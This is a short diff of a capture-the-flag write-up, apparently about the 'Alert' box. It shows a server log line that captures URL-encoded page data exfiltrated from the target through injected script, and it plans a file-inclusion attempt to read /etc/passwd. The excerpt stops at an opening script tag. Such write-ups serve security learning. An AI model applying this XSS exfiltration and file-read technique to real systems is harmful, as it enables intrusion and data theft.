jensmeindertsma/malachite/content/alert/alert.md

 10.10.11.44 - - [11/Dec/2024 15:49:00] "GET /?data=%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A HTTP/1.1" 200 -
 ```

+The first request comes from our machine (`10.10.14.8`), but the second request is, again, coming from the box itself.
+And it includes some data!

 This data string is URL-encoded, but nothing we can't reverse with a little CyberChef:

 ![using CyberChef to URL-decode the data](./images/cyberchef-messages.png)

 There is a reference to a `2024-03-10_15-48-34.txt` file, and it is being loaded using a `?file=` parameter.
-Maybe this one IS vulnerable to file inclusion!
+Maybe this parameter IS vulnerable to file inclusion!
 Let's try to load `/etc/passwd`:

 ```js
 <script>